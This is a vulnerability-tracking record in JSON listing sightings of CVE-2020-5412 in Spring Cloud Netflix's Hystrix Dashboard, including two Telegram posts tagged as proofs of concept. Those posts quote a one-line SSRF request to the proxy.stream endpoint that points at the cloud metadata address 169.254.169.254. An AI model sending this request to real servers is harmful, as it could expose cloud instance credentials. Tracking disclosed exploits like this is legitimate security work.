{"vulnerability": "CVE-2020-5412", "sightings": [{"uuid": "156c4309-b4c9-4bcb-8e63-e3657f67be3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-5412", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lj4bladk3t2i", "content": "", "creation_timestamp": "2025-02-26T21:02:00.332764Z"}, {"uuid": "d43d214e-4f70-43ca-995f-0fe571366e1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-5412", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/1683", "content": "#exploit\n1. CVE-2020-24034:\nSagemcom F@ST 5280 routers (firmware ver. 1.150.61) - Insecure deserialization/privilege escalation\nhttps://seclists.org/fulldisclosure/2020/Sep/3\n\n2. CVE-2020-5412:\nSpring Cloud Netflix (up to 2.1.5 / 2.2.3) - Hystrix Dashboard Privilege Escalation\n]-> PoC:\nGET /proxy.stream?origin=http://169.254.169.254/latest/metadata/ HTTP/1.1", "creation_timestamp": "2022-07-04T14:39:14.000000Z"}, {"uuid": "b865c153-ce00-4329-a0f0-47ce102b2cf9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-5412", "type": "published-proof-of-concept", "source": "https://t.me/cKure/2044", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 Exploit code. \n\nCVE-2020-5412 POC\n\nhostname/proxy.stream?origin=http://169.254.169.254/latest/metadata/", "creation_timestamp": "2020-09-01T20:40:11.000000Z"}]}